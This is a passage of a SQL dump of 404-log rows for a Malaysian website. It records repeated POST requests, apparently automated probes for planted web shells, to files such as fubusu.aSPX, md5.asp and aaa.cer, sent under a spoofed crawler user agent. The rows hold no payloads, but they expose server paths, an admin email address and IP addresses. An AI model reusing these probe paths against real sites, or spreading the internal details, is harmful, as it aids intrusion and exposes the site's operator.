14:33:04',35342424,37142648,'http://bintara.com.my//images/Album/Thumb.asp',1,0,'218.202.251.91'),(28942,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Images/fubusu.aSPX\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.195.232.237\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.195.232.237\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG2Cd2Cd74l7secq5lx9AAAAUI\";s:12:\"REDIRECT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51533\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:10:\"SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG2Cd2Cd74l7secq5lx9AAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571927561.236\";s:12:\"REQUEST_TIME\";s:10:\"1571927561\";}}','notice','2019-10-24 14:32:43','2019-10-24 14:32:41',35269920,37077200,'http://bintara.com.my//Images/fubusu.aSPX',1,0,'220.195.232.237'),(28941,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Images/fubusu.aSPX\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"203.93.159.116\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.93.159.116\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1@Eq-QPicCh3WFsYebwAAAI8\";s:12:\"REDIRECT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51185\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:10:\"SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1@Eq-QPicCh3WFsYebwAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927544.9212\";s:12:\"REQUEST_TIME\";s:10:\"1571927544\";}}','notice','2019-10-24 14:32:26','2019-10-24 14:32:25',35267248,37069680,'http://bintara.com.my//Images/fubusu.aSPX',1,0,'203.93.159.116'),(28940,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Images/fubusu.aSPX\";s:14:\"CONTENT_LENGTH\";s:3:\"400\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"222.47.120.212\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"222.47.120.212\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG16N2Cd74l7secq5lx6QAAAUI\";s:12:\"REDIRECT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:10:\"SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG16N2Cd74l7secq5lx6QAAAUI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927528.3815\";s:12:\"REQUEST_TIME\";s:10:\"1571927528\";}}','notice','2019-10-24 14:32:10','2019-10-24 14:32:08',35270912,37081064,'http://bintara.com.my//Images/fubusu.aSPX',1,0,'222.47.120.212'),(28939,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//Images/fubusu.aSPX\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.151.100.113\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.151.100.113\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG14t2Cd74l7secq5lx5gAAAUQ\";s:12:\"REDIRECT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50808\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/Images/fubusu.aSPX\";s:10:\"SCRIPT_URL\";s:19:\"/Images/fubusu.aSPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG14t2Cd74l7secq5lx5gAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927523.0324\";s:12:\"REQUEST_TIME\";s:10:\"1571927523\";}}','notice','2019-10-24 14:32:05','2019-10-24 14:32:03',35267288,37073568,'http://bintara.com.my//Images/fubusu.aSPX',1,0,'211.151.100.113'),(28938,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//chenf/oing/md5.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"121.55.50.107\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"121.55.50.107\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/chenf/oing/md5.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/chenf/oing/md5.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG10-5cHc@dX2BdZ47ESQAAAAA\";s:12:\"REDIRECT_URL\";s:19:\"/chenf/oing/md5.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50347\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/chenf/oing/md5.asp\";s:10:\"SCRIPT_URL\";s:19:\"/chenf/oing/md5.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG10-5cHc@dX2BdZ47ESQAAAAA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927507.5414\";s:12:\"REQUEST_TIME\";s:10:\"1571927507\";}}','notice','2019-10-24 14:31:49','2019-10-24 14:31:48',35336352,37131080,'http://bintara.com.my//chenf/oing/md5.asp',1,0,'121.55.50.107'),(28937,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//plus/img/face/aaa.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.166.111.32\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.166.111.32\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/plus/img/face/aaa.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1tv5cHc@dX2BdZ47EMgAAAAk\";s:12:\"REDIRECT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/plus/img/face/aaa.cer\";s:10:\"SCRIPT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1tv5cHc@dX2BdZ47EMgAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927478.9762\";s:12:\"REQUEST_TIME\";s:10:\"1571927478\";}}','notice','2019-10-24 14:31:21','2019-10-24 14:31:19',35270736,37073392,'http://bintara.com.my//plus/img/face/aaa.cer',1,0,'61.166.111.32'),(28936,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//plus/img/face/aaa.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.207.206.229\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.207.206.229\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/plus/img/face/aaa.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1od2Cd74l7secq5lxxgAAAVE\";s:12:\"REDIRECT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49448\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/plus/img/face/aaa.cer\";s:10:\"SCRIPT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1od2Cd74l7secq5lxxgAAAVE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927457.3407\";s:12:\"REQUEST_TIME\";s:10:\"1571927457\";}}','notice','2019-10-24 14:30:59','2019-10-24 14:30:57',35343784,37146440,'http://bintara.com.my//plus/img/face/aaa.cer',1,0,'220.207.206.229'),(28935,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//plus/img/face/aaa.cer\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"119.36.71.69\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"119.36.71.69\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/plus/img/face/aaa.cer\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1jUq-QPicCh3WFsYd3wAAAIw\";s:12:\"REDIRECT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"65466\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/plus/img/face/aaa.cer\";s:10:\"SCRIPT_URL\";s:22:\"/plus/img/face/aaa.cer\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1jUq-QPicCh3WFsYd3wAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927437.7554\";s:12:\"REQUEST_TIME\";s:10:\"1571927437\";}}','notice','2019-10-24 14:30:39','2019-10-24 14:30:38',35267944,37071192,'http://bintara.com.my//plus/img/face/aaa.cer',1,0,'119.36.71.69'),(28934,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//javascript/fan.asP\";s:14:\"CONTENT_LENGTH\";s:3:\"495\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"117.67.4.213\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"117.67.4.213\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/javascript/fan.asP\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/javascript/fan.asP\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG1cP5cHc@dX2BdZ47ECQAAABE\";s:12:\"REDIRECT_URL\";s:19:\"/javascript/fan.asP\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"64924\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/javascript/fan.asP\";s:10:\"SCRIPT_URL\";s:19:\"/javascript/fan.asP\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG1cP5cHc@dX2BdZ47ECQAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571927408.7717\";s:12:\"REQUEST_TIME\";s:10:\"1571927408\";}}','notice','2019-10-24 14:30:11','2019-10-24 